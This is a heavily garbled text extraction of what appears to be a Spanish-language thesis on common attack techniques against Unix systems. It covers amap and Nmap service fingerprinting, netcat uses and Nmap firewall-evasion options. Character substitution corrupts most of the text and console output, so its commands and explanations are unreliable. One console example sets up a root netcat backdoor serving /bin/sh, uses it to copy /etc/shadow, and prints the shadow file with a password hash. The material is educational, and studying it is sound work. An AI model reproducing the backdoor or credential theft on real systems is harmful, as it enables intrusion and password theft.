A a" "osee dos arc$ivos de /ir asH uno de triggers ;o Cdis"aradoresD> lla ado Ca""de/s.trigD ' otro de res"uestas conocidas no brado co o Ca""de/s.res"D. El "ri ero corres"onde a secuencias de b'tes o strings ;cadenas de te9to> a enviar a"enas se establece una cone9i8n ;en el caso de FC!>. El segundo "ertenece a las res"uestas de a"licaciones conocidas# ' "ueden estar relacionadas a un trigger o no# 'a que $a' servicios&"rotocolos en donde el servidor env)a un string o un conjunto de b'tes al cliente en "ri era instancia. Es decir# una res"uesta "uede ser generada "or un Cest) uloD en la cone9i8n a"enas iniciada ;el trigger> o recibida in ediata ente sin enviar nada. En la Consola *J se quizs uestra el /or ato de arc$ivo de triggers de A a" uestran triggers de los servicios junto con algunos eje "los. :os "ri eros tres
s co unes# co o son =FF!# ,MF! ' FF! ' se encuentran en /or ato
ascii ;te9to "lano>. !ara los tres Glti os ;5@, genrico en "uertos FC!&25! ' 5@, Bind**O> es necesario un trigger binario. Con la utilizaci8n de triggers binarios# 'a "uede a"reciarse la ventaja de usar este ti"o de $erra ientas a co "araci8n de telnet o netcat Ca anoD.
**J Enlace con algunos escneres de a"licaciones% $tt"%&§ools.org&a""(scanners.$t l **+ ,itio Ieb de A a"% $tt"%&&/reeIorld.t$c.org&t$c(a a"&. =ace algGn tie "o que no se actualiza ni se ven "rogresos en el desarrollo# co o s) sucede con @ a". **O Bind es la i "le entaci8n del so/tIare de servidor s "o"ular ' $asta "odr)a decirse que de re/erencia del "rotocolo 5@,. 2<:% $tt"%&&III.isc.org&inde9."lY&sI&bind&inde9."$" Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. O. de 22O
Consola *J% For ato del arc$ivo de Friggers de A a" ;traducido del ingls>
N T'i i t'e re pon e fi"e Vapp7ef .re pV for amap N N 2a $e pue ta tienen e" iguiente formato: N N N#3<:-T$8HH<$4-T$8HH<$4...00:-8PAP$OTO,O20: -38NA2<NHT?43#GA2<NHT?0:$<.PON.<A$<H<G N N N#3< <" nombre que imprime amap i "a 7efini!i%n !oin!i7e N !on "a re pue ta re!ibi7a 7e" er@i!io N T$8HH<$ 9op!iona": $equiere que "o 7ato re!ibi7o 'aEan i7o N "a re pue ta 7e un trigger !on e te nombre en N app7ef .trig. Pue7e eparar @ario !on una !oma. N 8PAP$OTO,O2 \ 9op!iona": $equiere que "a re pue ta re!ibi7a @enga @Za N e" proto!o"o t!p o u7p. Por 7efe!to on ambo . ?...@ N 2<NHT? 9op!iona": <" mZnimo E m]Dimo "argo 7e "a re pue ta N re!ibi7a4 epara7o por una !oma o un ^ni!o n^mero ?...@ N $<.PON.< < ta e una eDpre i%n regu"ar 7e Per" 9man per"re: que N er] e@a"ua7a en "o 7ato re!ibi7o N <Yemp"o : ?...@ 7n -bin79:7n -bin7:u7p::W...-[D00-[D7e0..........................[D!0 7n -bin7):7n -bin7:u7p::W...-[D00-[D7e0.......................... -W[D!00 7n -7Yb:7n -bin7:u7p::W...-[D)0-[D)30.Q@er ion.bin7 ?...@ 'ttp-apa!'e-1::t!p::W?TTP;.Q[n.er@er: #pa!'e;1 'ttp-apa!'e-(::t!p::W?TTP;.Q[n.er@er: #pa!'e;( ?...@ tftp::u7p::W[D00-[D03[D050[D00
Consola *+% For ato del arc$ivo de <es"uestas de A a" ;traducido del ingls>
"or la base de /ir as# co o "or eje "lo las relacionadas con los triggers de 5@, vistos "revia ente# unas res"uestas que t)"ica ente el servidor Ieb A"ac$e devuelve a los clientes ;no relacionado con ningGn trigger># ' una res"uesta a un "aquete 25! enviado a un servidor FFF!. Este arc$ivo de res"uestas conocidas razonable ente e9cede la cantidad de triggers conocidos# 'a que varias res"uestas "ueden estar asociadas a un trigger o a ningunoH lo ideal ser)a que cada res"uesta identi/ique una o varias versiones de iguales o di/erentes servidores. El /unciona iento de A a" es sencillo# ' se "uede resu ir en los siguientes "asos S,A@,UAMA!T% 7. 7nicializaci8n# carga de arc$ivos de triggers# res"uestas# etc. +. ,e reciben# entre otros "ar etros de entrada# $ost destino ' "uertos FC!&25! a analizar. ;. ,e intenta establecer cone9iones en "aralelo con el $ost ' "uerto nor al ente ;siendo con/igurable la cantidad de cone9iones si ultneas>. <. !or cada cone9i8n iniciada correcta ente se env)a un trigger que no $a'a sido "robado. ,e env)an en orden secuencial# tal co o se encuentran en el arc$ivo de /ir as. . !or cada rece"ci8n correcta de datos# se co "rueba el arc$ivo de res"uestas ' se evalGa si $a' coincidencia o no. #. ,e i "ri en las res"uestas coincidentes.
marcelo@saturno:~/src/amap&1.2$ .;amap -@ 19(.16).0.30 (1(1 (( K ing trigger fi"e .;app7ef .trig ... "oa7e7 35 trigger K ing re pon e fi"e .;app7ef .re p ... "oa7e7 390 re pon e K ing trigger fi"e .;app7ef .rp! ... "oa7e7 +50 trigger amap @5.( 9>>>.t'!.org;t'!-amap: 3#PP8NH mo7e tarte7 at (00)-0+-06 13:51:59 -
Tota" amount of ta 6 to perform in p"ain !onne!t mo7e: 56 *rotocol on 192.168.0. 0:2121/tcp !bD trigger Ittp&get" matcIes 6tp *rotocol on 192.168.0. 0:22/tcp !bD trigger Ittp&get" matcIes ssI *rotocol on 192.168.0. 0:22/tcp !bD trigger Ittp&get" matcIes ssI& openssI &aiting for timeout on 1 !onne!tion ... Kni7entifie7 port : none. amap @5.( fini 'e7 at (00)-0+-06 13:5(:00 marcelo@saturno:~/src/amap&1.2$
Consola *O% Eje "lo de ejecuci8n de A a"# detectando un servicio FF! ' un ?"en,,=
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. O2 de 22O
Entre otras caracter)sticas# A a" so"orta cone9iones ,,: ;que identi/ica correcta ente "or su ands ake> ' luego env)a los triggers co o si /uera una cone9i8n nor alH de esta anera# todos los triggers son Gtiles "ara cone9iones encri"tadas ta bin. En la Consola *O# A a" "uede identi/icar un servicio FF! a "esar de que est en un "uerto no estndar ;' que "revia ente se detect8 abierto con un "ort scanning>. !or Glti o es i "ortante notar que los "rotocolos ' servicios que env)an in/or aci8n inicial ;co o un 5anner> coincidirn sie "re con el trigger 9$tt"( getDH esto sucede "orque A a"# a"enas se establece la cone9i8n# env)a el "ri er trigger de la base de /ir as no enviado "revia ente. Esto "uede $acer que un ad inistrador detecte un co "orta iento e9traBo# 'a que en este caso "odr)a ver en los :ogs de co andos FF! ejecutados en el servidor un CPEF & =FF!&*..D# que corres"onde a un "rotocolo =FF!.
5.2.2.2. @ a"
@ a" en este as"ecto no di/iere de asiado en su co "orta iento con el A a"# salvo que su base de /ir as es Gnica ' est co unidad que lo rodea es aGn a costa de a sus usuarios. A lo largo de su ejecuci8n realiza un escaneo de "uertos estndar ;tal co o /ue descri"to en el ca")tulo anterior> '# quedndose con los "uertos abiertos# detecta los servicios de esta anera S@MA!UL,CA@T% s actualizada ;'a que la a'ores# ejor "a"el teniendo en a'or> ' sus ca"acidades ' "osibilidades son
7. Establece una cone9i8n con cada "uerto abierto. +. ,i se establece la cone9i8n sin "roble as# @ a" en "ri er lugar co ienza lo que se deno ina el CNull !robeD# que consiste en no enviar nada ' es"erar J segundos con la intenci8n de recibir datos. Aqu) es donde se conte "la a los servicios ' "rotocolos que env)an 5anners o in/or aci8n diversa in ediata ente luego de iniciarse la cone9i8n con el cliente. ;. ,i se reciben datos# se busca en el arc$ivo de /ir as una coincidencia relacionada con este probe.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. O- de 22O
;.7.,i
$a'
coincidencia
co "leta
;CduraD**0
co o
describe
la
docu entaci8n># el servicio est identi/icado ' ter ina el anlisis de ese "uerto. ;.+.En algunos otros casos# "uede $aber una coincidencia "arcial o CblandaD# que s8lo logra identi/icar de qu servicio se trata. Entonces lo que $ace @ a" es continuar ;ir al "aso 1># con la es"eranza de obtener luego una coincidencia CduraDH "ero lo $ace restringiendo el conjunto de probes s8lo a aquellos que reconocen en /or a co "leta este servicio ;' no a todos>. ;.;.Fa bin "uede que no $a'a coincidencias con este C@ull ProbeD# "or lo que se va al "aso 1. <. Co o todav)a no se envi8 nada "or la cone9i8n# se dar prioridad en el anlisis a los probes que posean en su listado de puertos el n'mero de puerto destino de la conexi-n . Estos nG eros de "uertos de cada sentencia Probe sirven "ara indicar que el is o tiene s "robabilidades de 9ito con estos "uertos que con otros. !or eje "lo# el !robe Coracle( tnsD inclu'e en su listado de "uertos el *52*# 'a que el servicio F@, :istener de ?racle es alta ente "robable que se encuentre escuc$ando en dic$o "uerto. @ueva ente# se env)an los "robes seleccionados ' al co "arar las res"uestas con la base "ara ver si $a' coincidencias# las "osibilidades vuelven a ser tres% <.7.=a' coincidencia co "leta. ,e ter ina el anlisis "ara este "uerto. <.+.=a' coincidencia "arcial. ,e restringen los "robes a realizar co o se describi8 en el "aso -.2 ' se continGa al "aso 5. <.;.@o $a' coincidencia. ,e salta al "aso 5. . En la a'or)a de los casos a esta altura 'a $ubo algGn ti"o de coincidencia. ,in e bargo# aqu) es donde se to a el conjunto de probes restantes "endientes de "rueba*2. ' se ejecutan. :a desventaja de llegar a este "unto es que no se "ueden reutilizar las cone9iones establecidas
**0 :a coincidencia co "leta o CduraD es aquella que logra identi/icar la "osibles% qu ,o/tIare envi8 los datos ' su versi8n e9acta o con el ,? en el que corre# 8dulos del servicio inclu)dos# etc. a'or cantidad de datos
*2. En esta instancia este conjunto de probes restantes "endientes de ejecuci8n se /iltra "revia ente "or el valor de rarit1 ;CrarezaD> que se utiliza en la detecci8n. Fodos los "robes que tengan rarit1 igual o enor al valor del escaneo# quedan seleccionados.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. O1 de 22O
"revia ente# 'a que se $an enviado datos anterior ente ' esto "uede CensuciarD o corro "er la "ruebaH es as) que "or cada probe "endiente se establece una nueva cone9i8n. #. ,i no es "osible reconocer qu servicio se encuentra del otro lado de la cone9i8n ;no $ubo ninguna coincidencia> ' "or otro lado se cuenta con alguna res"uesta a algGn probe# @ a" "ro'ecto. AGn si se llega al "unto 5# es i "ortante destacar que @ a" intenta acelerar el test co "leto en todo sentido# contando con una base de /ir as o"ti izadas ' bien organizadas# 'endo de lo es"ec)/ico. Fa bin cuenta con s genrico ' utilizado a lo u' s uestra "or consola el /inger"rint res"ectivo "ara que el usuario env)e dic$a /ir a a los desarrolladores del
elaboraci8n de reglas# co o las o"ciones de softmatc ' rarit1)A)H alteraci8n del /lujo descri"to en caso de contingencias con la sentencia fallbackH so"orte de scri"ts "ara "rocesa iento "ost(detecci8n "or si las e9"resiones regulares no son su/icientes "ara detectar ciertos servicios# etc. :as directivas
4ro(e: ,inta9is% Probe El string a enviar "er ite caracteres t)"icos de esca"e# co o ff# ft# fn ' f9== "ara los nG eros $e9adeci ales. matc9: ,inta9is% mat!' !erl% m;-eDpre
TnombreA er@i!io>FTpatr%n>F-informa!i%n 7e @er i%n0
etc.> ' ade s "er ite de/inir ca "os co o resultado ;Cno bre de "roductoD# CversionD# Cin/oD# Csiste a o"erativoD# etc.>. En la Consola *0 se uestra un eje "lo de la /or a en que @ a" al acena
tanto los probes co o el anlisis de las res"uestas gracias a la sentencia matc . Bsica ente la estructura consiste en%
@ull !robe _ ?"ciones del !robe b Conjunto !robe A _ ?"ciones del !robe b Conjunto S...T !robe B _ ?"ciones del !robe b Conjunto de
El "ri er "robe del arc$ivo es el @ull# seguido "or unos cuantos matc con 5anners de los servicios de FF!# ,,=# ,MF! ' L@C. En el segundo !robe se a"recian las directivas de nivel de rarit1 ' de "uertos t)"icos donde el Pet<equest tiene a'or "robabilidad de coincidencia# junto con un atc$ es"ec)/ico "ara el ,ervidor 4eb C$ero6ee.
N Nmap er@i!e 7ete!tion probe "i t -Q- mo7e: fun7amenta"L -QN M87: nmap- er@i!e-probe 6))0 (00)-03-0) 05:+0:13U 7oug M ?...@ N T'i i t'e NK22 probe t'at Yu t !ompare anE banner gi@en to u *robe 2$* 9F77 3OO N &ait for at "ea t 6 e!on7 for 7ata. 8t u e7 to be 54 but ome N mtp er@i!e 'a@e "ate"E been in tituting an artifi!ia" pau e 9 ee N B<#TK$<9JgreetApau eJ: in .en7mai"4 for eDamp"e: tota">aitm 6000 ?...@ mat!' ftp m;W((0-- 0.QBTP er@er [9=er ion 9>u---.[>0P:; p;&K-BTPD; @; M1; o;KniD; ?...@ mat!' ' mFW..?-9-[7.0P:-Open..?A9-[>.0P: BreeC.D-9-[70P:[nF p;Open..?; @;M(; i;BreeC.D M3L proto!o" M1; o;BreeC.D; ?...@ mat!' mtp mFW((0 --[>A0P <.3TP 9--[>A.0P: [9Debian;HNK[:[r[nF p;Po tfiD mtp7; ';M1; o;2inuD; i;Debian; ?...@ mat!' @n! mFW$BC 003[.009[7:[nMF p;=N,; i;proto!o" 3.M1; ?...@ *robe 2$* Bet/e3uest 3OBC2 / K22*/1.0PrPnPrPnO raritE 1 port 14704794)0)54))4113413941+34()04+974505451+451545+0455+45914631?...@ "port ++3 ?...@ mat!' 'ttp mFW?TTP;1[.0 [7[7[7 .Q[r[n.er@er: ,'ero6ee;9[7--.[>0P:[r[nF p;,'ero6ee 'ttp7; @;M1;
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. OJ de 22O
A"rovec$ar las debilidades del objetivo. Construir $erra ientas "ersonalizadas $aciendo uso de la ca"acidad de reutilizaci8n ' auto atizaci8n de otras s genricas.
J.*. @etcat
@etcat*2- es quiz la $erra ienta s verstil ' "o"ular que e9iste "ara ejorada ' $ac6ear en la redH tanto es as) que se lo suele conocer co o la Cnavaja suiza ultiusoD. :a versi8n original ;que data de *00J> /ue "osterior ente ada"tada "or varios desarrolladores ' "ro'ectos# "or lo que sus derivados "ueden encontrarse bajo el no bre de nc, ncat, pnetcat, socat, sock, socket ' sbd
S47R7U@CT#
ade s del @GU netcat)AIH todas son versiones que se encuentran a'or)a de los ,iste as ?"erativos ti"o 2ni9.
,u "ro"8sito es servir de C"uenteD "ara enviar ' recibir datos v)a cone9iones FC! o 25!# en /or a interactiva ;desde la consola> o desde scri"ts ' "rogra as. !or eje "lo# ' s8lo "ara dar una idea de su /unciona iento# su co "orta iento "or de/ecto es ace"tar datos "or la entrada estndar *25 ' enviarlos "or una cone9i8n establecida# a la salida estndar. 5e esta ientras que lo que recibe "or la is a lo redirige anera logra ser e9tre ada ente /le9ible ' ada"table
a un sinnG ero de situaciones# 'a que la cone9i8n "uede ser FC! o 25!. Co o analog)a# sirve "ensar en que es un s) il al co ando de 2ni9 CcatD *2J "ero que inclu'e en sus "osibilidades a los soc6ets FC! ' datagra as 25!.
*2- @etcat original% $tt"%&&III.vulnIatc$.org&netcat& *21 P@2 @etcat% $tt"%&&netcat.source/orge.net& *25 Ler Plosario% Entrada Estndar ;,F57@># ,alida Estndar ;,F5?2F># ,alida de Estndar de Errores ;,F5E<<># "g. 2*.. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. O+ de 22O
Ca")tulo J. ( J.*.@etcat
Entre sus usos t)"icos ' "osibles se encuentra% *. !robar ' e9"lorar "osibilidades con a"licaciones de red# siendo netcat el so/tIare que si ule ser el cliente o servidor. 2. C5ialogarD anual ente con un servicio so/tIare en un "rotocolo inteligible "ara un usuario tcnico# co o "or eje "lo =FF!# !?!-# ,MF!# FF!# etc. Ler Consola 2.. -. ,ervir de back door. Al estar inclu)do "or de/ecto en la a'or)a de versiones de 2ni9# es "robable que un atacante luego de obtener acceso a un servidor con/igure un netcat "ara servir un s$ell re oto ;Consola 2*># arc$ivos del servidor co "ro etido# o cualquier otra /unci8n. 1. 2tilizarlo de !ro9' de ,oc6ets ;o cone9iones>% !or eje "lo# si se necesita redirigir una cone9i8n desde 7nternet a una quina es"ec)/ica de la :A@ que se encuentra detrs de un $ost $aciendo @AF *2+# netcat se "uede utilizar en dic$o $ost "ara redirigir una cone9i8n $acia el destino /inal dentro de la :A@. :o interesante de esto es que netcat no necesitar de "rivilegios de ad inistrador# "udiendo realizarlo cualquier usuario no "rivilegiado*2O. 5. Escaneo de "uertos% ,i no se dis"one de @ a" o algGn otro "ort scanner# @etcat "osee ca"acidades de escaneador de "uertos. Ler Consola 22. J. !ost(intrusi8n% ,i se logra co "ro eter un $ost# es reco endable to ar las "recauciones del caso antes de enviar al "ara is o un 6it de $erra ientas a'or anlisisH consu ir "oco anc$o de banda de la red objetivo es
una de ellas# "or lo que una versi8n de @etcat co "ilado esttica ente *20
*2J Cat% Co ando 2ni9 que concatena una entrada a la salida estndar. :a entrada "uede ser un arc$ivo ;uno de los ele entos que son "ilares del odelo 2ni9>. *2+ Ler Plosario% @AF N @etIor6 Address Franslation# "g. 2**. *2O Cualquier "rogra a con "rivilegios de usuario Cno(rootD "uede escuc$ar "or cone9iones entrantes en "uertos a'ores a *.21H sta es una li itaci8n del eje "lo. Ade s# si se "oseen s sencillo realizar la redirecci8n de cone9iones o ento de traducirse de c8digo /uente a c8digo de "er isos de ad inistrador en el equi"o# es *20 Ejecutable esttico% A un "rogra a# en el
odi/icando las reglas de /iltrado del nGcleo ;i"tables&net/ilter# !F# 7"/I# AC:s# etc.>. quina ;eta"a de co "ilaci8n># se lo enlaza a la o las bibliotecas de c8digo de las cuales de"ende "ara "oder ejecutarse correcta ente. Este enlace "uede ser esttico o din ico. Cada uno tiene ventajas ' desventajas
S,2@U:7@RT
instalado en el siste a co "ro etido. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&,taticUlibrar' Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. OO de 22O
Ca")tulo J. ( J.*.@etcat
Consola 2.% @etcat co o cliente de a"licaciones de red# en este caso =FF! ' !?!-
En la Consola 2. se
a bas manuales. En negrita estn los co andos ejecutados "or el usuario# ' "osterior ente las res"uestas devueltas "or el servidor. Es interesante observar que cierta in/or aci8n Gtil se "uede obtener anejando estos "rotocolos a bajo nivel# lo que se describi8 co o Banner Prabbing en el a"artado 5.2.*.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. O0 de 22O
Ca")tulo J. ( J.*.@etcat
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 0. de 22O
Ca")tulo J. ( J.*.@etcat
!-er<idor" root@ubuntu&ser<er:~$ >'i"e -- ` -e ;tmp;.!errar -e ;bin; 'L 7one
!$liente" marcelo@saturno:~$ n! 19(.16).0.60 15679 ls &l tota" 10+ 7r>Dr-D--- 3 mar!e"o mar!e"o +096 (007-01-(7 16:56 !omp"etoAgrafi!o.'tm" -r>-r--r-- 1 mar!e"o mar!e"o +(+)( (007-01-(7 16:56 !omp"eto.'tm" -r>------- 1 mar!e"o mar!e"o (00)0 (007-01-(7 16:56 !omp"eto.nbe -r>-r--r-- 1 mar!e"o mar!e"o 11)1) (007-01-(7 15:17 7efau"tfu""p"ugin .'tm" -r>-r--r-- 1 mar!e"o mar!e"o 1301+ (007-01-(7 1+:3) 7efau"t.'tm" 7r>Dr-Dr-D ( mar!e"o mar!e"o +096 (007-01-(7 16:3( eDp"oit 7r>Dr-Dr-D ( mar!e"o mar!e"o +096 (007-01-(7 13:05 too" p>d ;'ome;mar!e"o Iostname ubuntu- er@er uname &a 2inuD ubuntu- er@er (.6.15-51- er@er N1 .3P Tue Beb 1( 17:1(:1) KT, (00) i6)6 HNK;2inuD !$trlT$" marcelo@saturno:~$ n! 19(.16).0.60 15679 > er@erA 'a7o> !at ;et!; 'a7o> tou!' ;tmp;.!errar !$trlT$" marcelo@saturno:~$ nc 192.168.0.60 11609 9KN5NO&N: -19(.16).0.600 15679 9*: : ,onne!tion refu e7 marcelo@saturno:~$ !at er@erA 'a7o> root:Q:135(6:0:99999:7::: 7aemon:Q:135(6:0:99999:7::: bin:Q:135(6:0:99999:7::: E :Q:135(6:0:99999:7::: En!:Q:135(6:0:99999:7::: game :Q:135(6:0:99999:7::: man:Q:135(6:0:99999:7::: "p:Q:135(6:0:99999:7::: mai":Q:135(6:0:99999:7::: ne> :Q:135(6:0:99999:7::: uu!p:Q:135(6:0:99999:7::: proDE:Q:135(6:0:99999:7::: >>>-7ata:Q:135(6:0:99999:7::: ba!6up:Q:135(6:0:99999:7::: "i t:Q:135(6:0:99999:7::: ir!:Q:135(6:0:99999:7::: gnat :Q:135(6:0:99999:7::: nobo7E:Q:135(6:0:99999:7::: 7'!p:`:135(6:0:99999:7::: E "og:`:135(6:0:99999:7::: 6"og:`:135(6:0:99999:7::: mar!e"o:M1Mt03?R#'BM;,P;>(t>5$n1DGr_P0eB(1:135+0:0:99999:7::: '7:`:135+0:0:99999:7::: ftp:`:139++:0:99999:7::: marcelo@saturno:~$
Consola 2*% Consola <e ota v)a @etcat. En negrita estn los co andos ti"eados "or el cliente
En la Consola 2* se
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 0* de 22O
Ca")tulo J. ( J.*.@etcat
relacionado con la sencilla e9tracci8n de in/or aci8n re ota de un equi"o# co o es el caso de una "uerta trasera ;back door>. !ri ero se ejecuta en el servidor un loop ;bucle> donde sie "re se sirven cone9iones ;en este caso se "oseen "er isos de root> $asta que no e9ista el arc$ivo &t "&.cerrar. :uego# desde el nodo cliente# el usuario se conecta a dic$o servidor ' ejecuta di/erentes co andos que son inter"retados "or &bin&s$. ,i bien "osterior ente se /inaliza la cone9i8n con un Ctrl_C# gracias a que el netcat en el servidor se encuentra dentro de un bucle I$ile ;' a que sigue sin e9istir el arc$ivo &t "&.cerrar># el cliente se "uede volver a conectar# esta vez redirigiendo la salida a un arc$ivo. As) se obtiene el arc$ivo de s$adoI *-. en el servidor. !or Glti o se crea el arc$ivo &t "&.cerrar con el co ando touc$# ' se veri/ica que la "uerta trasera $a'a quedado cerrada.*-*
marcelo@saturno:~$ u7o n! -@@ -O -p )0 19(.16).0.30 (1 53 79-)( !i!"on -19(.16).0.300 (1 9ftp: open !i!"on -19(.16).0.300 53 97omain: open !i!"on -19(.16).0.300 )( 9*: : ,onne!tion refu e7 !i!"on -19(.16).0.300 )1 9*: : ,onne!tion refu e7 !i!"on -19(.16).0.300 )0 9>>>: : ,onne!tion refu e7 !i!"on -19(.16).0.300 79 9finger: : ,onne!tion refu e7 ent 04 r!@7 0 marcelo@saturno:~$ u7o n! -@@ -O -p )0 19(.16).0.30 (1 53 79-)( ent 04 r!@7 0 !$trlT$" marcelo@saturno:~$ u7o n! -@@ -O -p )0 -> 5 19(.16).0.30 (1 53 79-)( !i!"on -19(.16).0.300 (1 9ftp: open !i!"on -19(.16).0.300 53 97omain: open !i!"on -19(.16).0.300 )( 9*: : ,onne!tion time7 out !i!"on -19(.16).0.300 )1 9*: : ,onne!tion time7 out !i!"on -19(.16).0.300 )0 9>>>: : ,onne!tion time7 out !i!"on -19(.16).0.300 79 9finger: : ,onne!tion time7 out ent 04 r!@7 0 marcelo@saturno:~$
entrada&salida cero>. El "ri er eje "lo escanea los "uertos destino 2*# 5- ' el rango +0 al O2 de la 7! *02.*JO...-.# /ijando el "uerto origen al O. ;'a que "uede "asar "or edio de algunos /ireIalls sin estado>H la o"ci8n (vv $ace que se
*-. Arc$ivo s ado.% Arc$ivo de contraseBas del siste a o"erativo# al acenado en /or a de C/unci8n resu enD o as , Es necesario "oseer "er isos de root "ara leerlo. *-* ,i bien la "uerta trasera qued8 cerrada# a /ines de conseguir e/ectiva ente $izo. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 02 de 22O a'or si "licidad en el eje "lo se $an obviado "asos que di/icultar)an al ad inistrador el rastreo de qu es lo que el atacante
Ca")tulo J. ( J.*.@etcat
uestre
s in/or aci8n "or consola del "rogreso de la o"eraci8n. is a 7!# "ero en este
caso se "uede a"reciar qu sucede si el objetivo "osee un /ireIall con "ol)ticas de 5<?!% @etcat queda CbloqueadoD en un "uerto /iltrado es"erando a que e9"ire la cone9i8n "ara "asar al siguiente. !ara evitar esto se "uede establecer el ti eout con el "ar etro (I# que en el tercer intento se estableci8 en 5 segundos. ,i bien es interesante la variedad de "osibilidades que o/rece @etcat# es i "ortante resaltar que los escaneos que realiza son del Fi"o Connect# "or lo que son los s CruidososD en cuanto al tr/ico ' logs generados.
En la Ca"tura *5# donde se "uede a"reciar un escaneo con 5eco's# interactGan los siguientes $osts% A> ?rigen @ a"% 7! *02.*JO...2 N MAC address% ..%*+%-*%0J%5b%*/ B> 7! Falsi/icada *% *02.*JO...*.. N MAC address% ..%.c%20%0.%2a%2d C> 7! Falsi/icada 2% *02.*JO...2. N MAC address% ..%.c%20%OJ%*2%a5> =ost ?bjetivo% *02.*JO...-. N MAC address% ..%.c%20%e*%a2%2J :o interesante es que co o se detall8 en el 7dle ,can ;"gina 5*># todo $ost que recibe un ,K@_ACR devuelve un <,F al origen. @ a"# aGn cuando el ,K@_ACR le es Gtil ' su/iciente "ara deter inar que el "uerto est abierto# si ula el co "orta iento que ado"ta el resto de los $osts cu'as 7!s /ueron /alsi/icadas ;"aquetes 2- ' 20># es decir# env)a un <,F ta bin. Co o "rinci"al desventaja al $abilitar esta o"ci8n en un "ortscan se "uede que conlleva. En negrita se indican algunos "untos interesantes de la ca"tura# co o el s"oo/ing ' las "eticiones A<! contestadas "or el $ost CoriginalD. encionar la lentitud
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 01 de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 05 de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 0J de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 0+ de 22O
2ra)mentar los paquetes que se env)an% :a o"ci8n C(/D o C(( tuD $ace que @ a" /rag ente los "aquetes 7! en Glti"los de O# $aciendo caso o iso del MF2 que "osea con/igurada la inter/az de red. El "ri er "ar etro sirve "ara /rag entar en o//sets de O ;C(/D> o *J b'tes ;C(/ (/D># ' el segundo "ara elegir un valor "ersonalizado ;"or eje "lo# C(( tu 21D># sie "re en Glti"los de O. ,in e bargo# es i "ortante aclarar que algunos u' u' di/undidaH los /ireIalls actuales e 75,s directa ente /iltran el contenido /rag entado# 'a que es una tcnica de evasi8n resultados "ueden variar. Utili3aci-n de un puerto ori)en =ijo% ,i la red objetivo "osee un /ireIall sin estado o o 5MQ
*-2
al con/igurado# es
o"ci8n C((source("ort hnroUdeU"uertoeD o C(g hnroUdeU"uertoeD obliga a que @ a" utilice un "uerto origen /ijo en todo el escaneo# "ara tratar de /iltrarse "or estos C$uecosD. :a desventaja est en que i "ide la "aralelizaci8n del escaneo# ' "or lo tanto ser aneja t)"ica ente sobre l# es s lento. !or el lado de 25!# co o es un "rotocolo sin estado# ' 5@, es un "rotocolo que se u' Gtil co binar esta o"ci8n con el ensaje "ar etro 5-H as) se "uede si ular ante el /ireIall que el "roviene de un ,ervidor 5@, ' "asar el escaneo 25! "or l. /on=i)uraci-n del esquema de tempori3aci-n a utili3ar % ,i bien @ a" "osee uc$as o"ciones "ara con/igurar al 9i o los timers a utilizar en el "ortscan# e9isten ta bin "lantillas# esque as o templates "rede/inidos de ante ano# gracias a la o"ci8n C(F h"lantillaeD o C(FnG eroD# donde el "ar etro "uede ser% .. paranoid ;C"aranoicoD>% Es la con/iguraci8n de escaneo inutos entre probes. Evita en teor)a la gran s lenta ' conservadora "osible. Escanea los "uertos en serie# ' es"era "or 5 a'or)a de los 75,s. *. snea:! ;CcautelosoD>% Es"era "or *5 segundos entre probes# ' ta bin realiza el escaneo en serie. Es un balance entre velocidad '
*-2 Ler Plosario% 5MQ% Qona 5es ilitarizada# "g. 2*.. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 0O de 22O
"osibilidades de evitar 75,s. 2. polite ;CeducadoD>% Este tiene odo es Gtil si la red es "oco con/iable ' uc$as ca)das# o tiene "oco anc$o de bandaH @ a" es"era "or odo "or de/ecto# que ade s inclu'e la "aralelizaci8n ilisegundos entre "robesH es
.#1 segundos entre "robes# que ta bin son en serie. -. normal% Es el de los probes. 1. a))resive ;CagresivoD>% Es"era "or *. conveniente "or sobre el de red. 5. insane ;CinsanoD>% ,8lo sirve si se dis"one de una e9celente cone9i8n ' se "re/iere sacri/icar "recisi8n en "os de velocidad# 'a que s8lo es"era "or 5 ilisegundos entre probes. 5e todas /or as# cabe resaltar que el tie "o entre probes no es el Gnico "ar etro que con/igura auto tica ente el te "late elegido# sino que cada uno es una co binaci8n de C(( a9(rtt(ti eoutD# C((initial(rtt( ti eoutD# C(( a9(retriesD# C(($ost(ti eoutD# etc. Aleatori3ar los 9osts a escanear% ,i se est escaneando una red con uc$os $osts# es s "robable que "ase desa"ercibido un scan ClentoD ' aleatorio en el sentido de los $osts a enviar los probes. :a o"ci8n C(( rando ize($ostsD activa esta caracter)stica. odo nor al si se "osee una buena cone9i8n
"uedan e9"eri entar sin conocer "revia ente las o"ciones de la consola. Ade s# /acilita el guardado de in/or es de escaneos "revios# co binar ' co "arar varios resultados# $acer varios escaneos al "er/iles co "letos de escaneo. is o tie "o ' crear
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 00 de 22O
Bsica ente consiste en la "osibilidad de i "le entar scri"ts *-- o /rag entos de c8digo /uncionales que a "l)an las ca"acidades inclu)das en el so/tIare# con di/erentes objetivos# co o "or eje "lo% 4roceso de descu(rimiento de Red% 5ado el caso# si se escanea una 2<:# se "uede buscar auto tica ente en bases de datos "Gblicas "or in/or aci8n Gtil.
